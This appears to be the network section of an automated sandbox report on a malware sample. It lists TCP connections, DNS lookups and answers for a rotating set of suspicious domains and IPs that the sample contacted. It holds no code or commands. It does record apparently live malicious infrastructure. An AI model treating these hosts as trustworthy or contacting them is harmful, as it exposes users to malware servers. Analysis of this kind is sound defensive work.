                                                                      Dec 10, 2024 15:16:41.539537907 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:41.825720072 CET4973180192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.845138073 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.964500904 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:42.967947006 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:42.979713917 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:43.099003077 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.212985992 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213069916 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213083029 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213169098 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:44.213167906 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.213217974 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.219104052 CET4973280192.168.2.11161.97.142.144
                                                                      Dec 10, 2024 15:16:44.338438034 CET8049732161.97.142.144192.168.2.11
                                                                      Dec 10, 2024 15:16:52.412632942 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.532144070 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:52.532255888 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.620763063 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:52.745179892 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.026968956 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.026981115 CET804973335.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:54.027038097 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:54.137799025 CET4973380192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.179739952 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.299040079 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:55.299216032 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.379549026 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:55.498820066 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791238070 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791259050 CET804973435.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:56.791327000 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:56.903278112 CET4973480192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:57.923352957 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.042901039 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:58.043004036 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.065290928 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:16:58.184551001 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:58.184618950 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:59.536801100 CET804973535.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:16:59.575237989 CET4973580192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.594234943 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.713635921 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:00.713799000 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.723587036 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:00.842858076 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208415031 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208903074 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:02.208967924 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:02.230947971 CET4973680192.168.2.1135.220.176.144
                                                                      Dec 10, 2024 15:17:02.350372076 CET804973635.220.176.144192.168.2.11
                                                                      Dec 10, 2024 15:17:08.253874063 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.373245955 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:08.373316050 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.395220995 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:08.514848948 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.903767109 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:09.950735092 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.950830936 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:09.951112986 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:09.951181889 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:10.022995949 CET8049737101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:10.023149014 CET4973780192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:10.923671961 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.043154955 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:11.043344975 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.061856031 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:11.181386948 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526433945 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526609898 CET8049738101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:12.526668072 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:12.575125933 CET4973880192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.594377041 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.713680029 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:13.713982105 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.729052067 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:13.848378897 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:13.848489046 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:15.231589079 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:15.351766109 CET8049739101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:15.355936050 CET4973980192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.251024961 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.370476961 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:16.370562077 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.382314920 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:16.501705885 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.873094082 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.874558926 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:17.878047943 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:17.881861925 CET4974080192.168.2.11101.35.209.183
                                                                      Dec 10, 2024 15:17:18.001161098 CET8049740101.35.209.183192.168.2.11
                                                                      Dec 10, 2024 15:17:23.221843004 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.341309071 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:23.341535091 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.357057095 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:23.477154016 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658584118 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658595085 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658674002 CET8049741108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:24.658709049 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:24.658740997 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:24.872260094 CET4974180192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:25.891041994 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.010530949 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:26.010601997 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.035084009 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:26.154442072 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.261723995 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.261820078 CET8049742108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:27.262032032 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:27.545830965 CET4974280192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.562994957 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.682311058 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:28.682487965 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.697606087 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:28.820826054 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:28.820837021 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.923934937 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924335003 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924510002 CET8049743108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:29.924526930 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:29.924653053 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:30.200210094 CET4974380192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.221501112 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.340815067 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:31.342099905 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.354883909 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:31.474626064 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559376955 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559417963 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559432030 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:32.559626102 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:32.564213037 CET4974480192.168.2.11108.181.189.7
                                                                      Dec 10, 2024 15:17:32.685380936 CET8049744108.181.189.7192.168.2.11
                                                                      Dec 10, 2024 15:17:38.138999939 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.259293079 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:38.259394884 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.277431965 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:38.396925926 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.482867956 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.483082056 CET8049745209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:39.485549927 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:39.799819946 CET4974580192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.813079119 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.932368040 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:40.932476997 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:40.950670958 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:41.072000980 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.181890965 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.182169914 CET8049746209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:42.182235003 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:42.468777895 CET4974680192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.486398935 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.605644941 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:43.605747938 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.623826981 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:43.743155003 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:43.743231058 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840209961 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840553999 CET8049747209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:44.840655088 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:45.139828920 CET4974780192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.158123016 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.277638912 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:46.277719021 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.289422035 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:46.408886909 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:47.511436939 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:47.511750937 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:47.511905909 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:47.514519930 CET4974880192.168.2.11209.74.77.107
                                                                      Dec 10, 2024 15:17:47.636212111 CET8049748209.74.77.107192.168.2.11
                                                                      Dec 10, 2024 15:17:53.055867910 CET4974980192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:53.175087929 CET804974977.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:53.176295042 CET4974980192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:53.190988064 CET4974980192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:53.311578035 CET804974977.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:54.418369055 CET804974977.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:54.418505907 CET804974977.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:54.418606997 CET4974980192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:54.700259924 CET4974980192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:55.719851017 CET4975080192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:55.839329004 CET804975077.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:55.839448929 CET4975080192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:55.856019020 CET4975080192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:55.975435019 CET804975077.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:57.098282099 CET804975077.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:57.098589897 CET804975077.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:57.098656893 CET4975080192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:57.372428894 CET4975080192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:58.391880989 CET4975180192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:58.511039972 CET804975177.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:58.511137962 CET4975180192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:58.527914047 CET4975180192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:17:58.647099018 CET804975177.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:58.647200108 CET804975177.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:59.820360899 CET804975177.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:59.820549965 CET804975177.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:17:59.821765900 CET4975180192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:00.044416904 CET4975180192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:01.063721895 CET4975280192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:01.183039904 CET804975277.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:18:01.184098005 CET4975280192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:01.195872068 CET4975280192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:01.315196991 CET804975277.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:18:02.419389963 CET804975277.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:18:02.420059919 CET804975277.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:18:02.420104980 CET4975280192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:02.424689054 CET4975280192.168.2.1177.68.64.45
                                                                      Dec 10, 2024 15:18:02.544020891 CET804975277.68.64.45192.168.2.11
                                                                      Dec 10, 2024 15:18:08.588687897 CET4975380192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:09.030739069 CET8049753146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:09.030838013 CET4975380192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:09.057461023 CET4975380192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:09.176882982 CET8049753146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:10.559614897 CET4975380192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:10.679296970 CET8049753146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:10.679387093 CET4975380192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:11.578893900 CET4975480192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:11.698324919 CET8049754146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:11.703852892 CET4975480192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:11.719854116 CET4975480192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:11.839135885 CET8049754146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:12.988253117 CET8049754146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:12.988358974 CET8049754146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:12.988465071 CET4975480192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:13.231493950 CET4975480192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:14.253530025 CET4975580192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:14.373795033 CET8049755146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:14.373872042 CET4975580192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:14.392503023 CET4975580192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:14.512095928 CET8049755146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:14.512109995 CET8049755146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:15.652673006 CET8049755146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:15.652749062 CET8049755146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:15.652970076 CET4975580192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:15.903368950 CET4975580192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:16.925143957 CET4975680192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:17.044471979 CET8049756146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:17.044615030 CET4975680192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:17.054034948 CET4975680192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:17.173296928 CET8049756146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:18.365518093 CET8049756146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:18.365592003 CET8049756146.88.233.115192.168.2.11
                                                                      Dec 10, 2024 15:18:18.365674973 CET4975680192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:18.369327068 CET4975680192.168.2.11146.88.233.115
                                                                      Dec 10, 2024 15:18:18.488559961 CET8049756146.88.233.115192.168.2.11

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 10, 2024 15:15:14.391560078 CET5858253192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:15:15.255031109 CET53585821.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:15:31.797949076 CET6435753192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:15:32.793838978 CET6435753192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:15:33.279563904 CET53643571.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:15:33.279593945 CET53643571.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:15:47.837440014 CET6501453192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:15:48.840795040 CET6501453192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:15:49.029551983 CET53650141.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:15:49.029664040 CET53650141.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:03.429546118 CET5790353192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:03.888849020 CET53579031.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:18.477471113 CET5664053192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:19.238435030 CET53566401.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:34.330466986 CET6316653192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:34.812799931 CET53631661.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:49.257860899 CET5008153192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:50.262960911 CET5008153192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:51.278445005 CET5008153192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:16:52.082631111 CET53500811.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:52.082698107 CET53500811.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:16:52.082707882 CET53500811.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:17:07.237834930 CET6087753192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:17:08.247181892 CET6087753192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:17:08.250941992 CET53608771.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:17:08.384809017 CET53608771.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:17:22.891746044 CET5152053192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:17:23.216521025 CET53515201.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:17:37.579632998 CET5567753192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:17:38.136001110 CET53556771.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:17:52.532833099 CET5526853192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:17:53.053123951 CET53552681.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:18:07.438886881 CET5806553192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:18:08.450376987 CET5806553192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:18:08.586062908 CET53580651.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:18:08.587158918 CET53580651.1.1.1192.168.2.11
                                                                      Dec 10, 2024 15:18:23.377926111 CET5039453192.168.2.111.1.1.1
                                                                      Dec 10, 2024 15:18:23.711416006 CET53503941.1.1.1192.168.2.11

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 10, 2024 15:15:14.391560078 CET192.168.2.111.1.1.10x15f7Standard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:31.797949076 CET192.168.2.111.1.1.10x509bStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:32.793838978 CET192.168.2.111.1.1.10x509bStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:47.837440014 CET192.168.2.111.1.1.10x1d3fStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:48.840795040 CET192.168.2.111.1.1.10x1d3fStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.429546118 CET192.168.2.111.1.1.10x7c54Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:18.477471113 CET192.168.2.111.1.1.10xe2c6Standard query (0)www.goldstarfootwear.shopA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:34.330466986 CET192.168.2.111.1.1.10x3985Standard query (0)www.070002018.xyzA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:49.257860899 CET192.168.2.111.1.1.10x758Standard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:50.262960911 CET192.168.2.111.1.1.10x758Standard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:51.278445005 CET192.168.2.111.1.1.10x758Standard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:07.237834930 CET192.168.2.111.1.1.10x4458Standard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:08.247181892 CET192.168.2.111.1.1.10x4458Standard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:22.891746044 CET192.168.2.111.1.1.10x29e8Standard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:37.579632998 CET192.168.2.111.1.1.10xc8bdStandard query (0)www.beyondfitness.liveA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:52.532833099 CET192.168.2.111.1.1.10xb9caStandard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:07.438886881 CET192.168.2.111.1.1.10x63c5Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:08.450376987 CET192.168.2.111.1.1.10x63c5Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:23.377926111 CET192.168.2.111.1.1.10x4c8dStandard query (0)www.alihones.lolA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 10, 2024 15:15:15.255031109 CET1.1.1.1192.168.2.110x15f7No error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:15.255031109 CET1.1.1.1192.168.2.110x15f7No error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:33.279563904 CET1.1.1.1192.168.2.110x509bNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:33.279563904 CET1.1.1.1192.168.2.110x509bNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:33.279593945 CET1.1.1.1192.168.2.110x509bNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:33.279593945 CET1.1.1.1192.168.2.110x509bNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:15:49.029551983 CET1.1.1.1192.168.2.110x1d3fNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
